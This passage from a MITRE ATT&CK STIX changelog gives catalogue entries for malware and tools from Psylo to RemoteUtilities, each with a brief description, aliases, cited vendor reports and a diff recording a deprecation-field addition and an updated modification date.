"malware--dfb5fa9b-3051-4b97-8035-08f80aef945b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:53.268000+00:00", + "modified": "2025-04-25 14:44:53.196000+00:00", + "name": "Psylo", + "description": "[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM](https://attack.mitre.org/software/S0076). 
(Citation: Scarlet Mimic Jan 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0078", + "external_id": "S0078" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Psylo" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:53.196000+00:00\", \"old_value\": \"2025-04-16 20:38:39.039000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a19c1197-9414-46e3-986f-0f609ff4a46b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-01 19:44:27.287000+00:00", + "modified": "2025-04-25 14:44:15.316000+00:00", + "name": "Pysa", + "description": "[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0583", + "external_id": "S0583" + }, + { + 
"source_name": "Pysa", + "description": "(Citation: CERT-FR PYSA April 2020)(Citation: DFIR Pysa Nov 2020)(Citation: NHS Digital Pysa Oct 2020)" + }, + { + "source_name": "Mespinoza", + "description": "(Citation: CERT-FR PYSA April 2020)(Citation: DFIR Pysa Nov 2020)(Citation: NHS Digital Pysa Oct 2020)" + }, + { + "source_name": "CERT-FR PYSA April 2020", + "description": "CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021.", + "url": "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf" + }, + { + "source_name": "DFIR Pysa Nov 2020", + "description": "THe DFIR Report. (2020, November 23). PYSA/Mespinoza Ransomware. Retrieved March 17, 2021.", + "url": "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/" + }, + { + "source_name": "NHS Digital Pysa Oct 2020", + "description": "NHS Digital. (2020, October 10). Pysa Ransomware: Another 'big-game hunter' ransomware. Retrieved March 17, 2021.", + "url": "https://digital.nhs.uk/cyber-alerts/2020/cc-3633" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Pysa", + "Mespinoza" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:15.316000+00:00\", \"old_value\": \"2025-04-16 20:38:27.874000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--8c553311-0baa-4146-997a-f79acef3d831", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 
21:32:38.480000+00:00", + "modified": "2025-04-25 14:43:59.385000+00:00", + "name": "RARSTONE", + "description": "[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0055", + "external_id": "S0055" + }, + { + "source_name": "Aquino RARSTONE", + "description": "Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/rarstone-found-in-targeted-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RARSTONE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:59.385000+00:00\", \"old_value\": \"2025-04-16 20:38:21.673000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:11.826000+00:00", + "name": "RATANKBA", + "description": "[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). 
[RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0241", + "external_id": "S0241" + }, + { + "source_name": "RATANKBA", + "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" + }, + { + "source_name": "Lazarus RATANKBA", + "description": "Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. 
Retrieved May 22, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RATANKBA" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:11.826000+00:00\", \"old_value\": \"2025-04-16 20:38:26.215000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-28 17:26:36.168000+00:00", + "modified": "2025-04-25 14:43:13.198000+00:00", + "name": "RDAT", + "description": "[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector.(Citation: Unit42 RDAT July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0495", + "external_id": "S0495" + }, + { + "source_name": "Unit42 RDAT July 2020", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. 
Retrieved July 28, 2020.", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RDAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:13.198000+00:00\", \"old_value\": \"2025-04-16 20:38:05.635000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--065196de-d7e8-4888-acfb-b2134022ba1b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-11 16:13:19.588000+00:00", + "modified": "2025-04-25 14:42:34.305000+00:00", + "name": "RDFSNIFFER", + "description": "[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0416", + "external_id": "S0416" + }, + { + "source_name": "FireEye FIN7 Oct 2019", + "description": "Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators\u2019 New Tools and Techniques. 
Retrieved October 11, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RDFSNIFFER" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:34.305000+00:00\", \"old_value\": \"2025-04-16 20:37:52.986000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b9eec47e-98f4-4b3c-b574-3fa8a87ebe05", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:32.382000+00:00", + "name": "RGDoor", + "description": "[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0258", + "external_id": "S0258" + }, + { + "source_name": "RGDoor", + "description": "(Citation: Unit 42 RGDoor Jan 2018)" + }, + { + "source_name": "Unit 42 RGDoor Jan 2018", + "description": "Falcone, R. (2018, January 25). 
OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RGDoor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:32.382000+00:00\", \"old_value\": \"2025-04-16 20:38:32.672000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--ad4f146f-e3ec-444a-ba71-24bffd7f0f8e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:11.911000+00:00", + "modified": "2025-04-25 14:44:22.846000+00:00", + "name": "RIPTIDE", + "description": "[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0003", + "external_id": "S0003" + }, + { + "source_name": "Moran 2014", + "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group [Blog]. 
Retrieved November 12, 2014.", + "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RIPTIDE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:22.846000+00:00\", \"old_value\": \"2025-04-16 20:38:30.044000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--cba78a1c-186f-4112-9e6a-be1839f030f7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:07.565000+00:00", + "modified": "2025-04-25 14:44:42.600000+00:00", + "name": "ROCKBOOT", + "description": "[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0112", + "external_id": "S0112" + }, + { + "source_name": "FireEye Bootkits", + "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. 
Retrieved May 13, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ROCKBOOT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:42.600000+00:00\", \"old_value\": \"2025-04-16 20:38:35.715000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:33.037000+00:00", + "name": "ROKRAT", + "description": "[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067) to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) has used ROKRAT during several campaigns from 2016 through 2021.(Citation: Talos ROKRAT)(Citation: Talos Group123)(Citation: Volexity InkySquid RokRAT August 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0240", + "external_id": "S0240" + }, + { + "source_name": "ROKRAT", + "description": "(Citation: Talos ROKRAT 2) (Citation: Talos Group123)" + }, + { + "source_name": "Talos ROKRAT", + "description": "Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. 
Retrieved May 21, 2018.", + "url": "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html" + }, + { + "source_name": "Talos Group123", + "description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.", + "url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + }, + { + "source_name": "Volexity InkySquid RokRAT August 2021", + "description": "Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.", + "url": "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/" + }, + { + "source_name": "Talos ROKRAT 2", + "description": "Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.", + "url": "https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ROKRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:33.037000+00:00\", \"old_value\": \"2025-04-16 20:38:12.531000+00:00\"}}}", + "previous_version": "2.3" + }, + { + "type": "malware", + "id": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-27 16:58:08.242000+00:00", + "modified": "2025-04-25 14:44:32.751000+00:00", + "name": "Ramsay", + "description": "[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework 
designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0458", + "external_id": "S0458" + }, + { + "source_name": "Ramsay", + "description": "(Citation: Eset Ramsay May 2020)" + }, + { + "source_name": "Eset Ramsay May 2020", + "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020.", + "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/" + }, + { + "source_name": "Antiy CERT Ramsay April 2020", + "description": "Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel's infiltration and isolation network. 
Retrieved March 24, 2021.", + "url": "https://www.programmersought.com/article/62493896999/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ramsay" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Harry Kim, CODEMIZE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:32.751000+00:00\", \"old_value\": \"2025-04-16 20:38:32.837000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--9752aef4-a1f3-4328-929f-b64eb0536090", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:08.401000+00:00", + "name": "RawPOS", + "description": "[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. 
(Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0169", + "external_id": "S0169" + }, + { + "source_name": "RawPOS", + "description": "(Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "FIENDCRY", + "description": "The FIENDCRY component is a memory scraper based on MemPDump that scans through process memory looking for regular expressions. Its stage 1 component scans all processes, and its stage 2 component targets a specific process of interest. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: Github Mempdump) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "DUEBREW", + "description": "The DUEBREW component is a Perl2Exe binary launcher. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "DRIFTWOOD", + "description": "The DRIFTWOOD component is a Perl2Exe compiled Perl script used by G0053 after they have identified data of interest on victims. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "Kroll RawPOS Jan 2017", + "description": "Nesbit, B. and Ackerman, D. (2017, January). Malware Analysis Report - RawPOS Malware: Deconstructing an Intruder\u2019s Toolkit. Retrieved October 4, 2017.", + "url": "https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware" + }, + { + "source_name": "TrendMicro RawPOS April 2015", + "description": "TrendLabs Security Intelligence Blog. (2015, April). RawPOS Technical Brief. 
Retrieved October 4, 2017.", + "url": "http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf" + }, + { + "source_name": "Visa RawPOS March 2015", + "description": "Visa. (2015, March). Visa Security Alert: \"RawPOS\" Malware Targeting Lodging Merchants. Retrieved October 6, 2017.", + "url": "https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf" + }, + { + "source_name": "Mandiant FIN5 GrrCON Oct 2016", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8" + }, + { + "source_name": "DarkReading FireEye FIN5 Oct 2015", + "description": "Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.", + "url": "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" + }, + { + "source_name": "Github Mempdump", + "description": "DiabloHorn. (2015, March 22). mempdump. 
Retrieved October 6, 2017.", + "url": "https://github.com/DiabloHorn/mempdump" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RawPOS", + "FIENDCRY", + "DUEBREW", + "DRIFTWOOD" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Walker Johnson" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:08.401000+00:00\", \"old_value\": \"2025-04-16 20:38:24.883000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--4e6b9625-bbda-4d96-a652-b3bb45453f26", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:43:16.265000+00:00", + "name": "RemoteCMD", + "description": "[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to SysInternal's PSEXEC functionality. (Citation: Symantec Buckeye)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0166", + "external_id": "S0166" + }, + { + "source_name": "Symantec Buckeye", + "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. 
Retrieved September 26, 2016.", + "url": "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RemoteCMD" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:16.265000+00:00\", \"old_value\": \"2025-04-16 20:38:06.578000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-18 14:57:34.628000+00:00", + "modified": "2025-04-25 14:45:11.980000+00:00", + "name": "RemoteUtilities", + "description": "[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0592", + "external_id": "S0592" + }, + { + "source_name": "Trend Micro Muddy Water March 2021", + "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. 
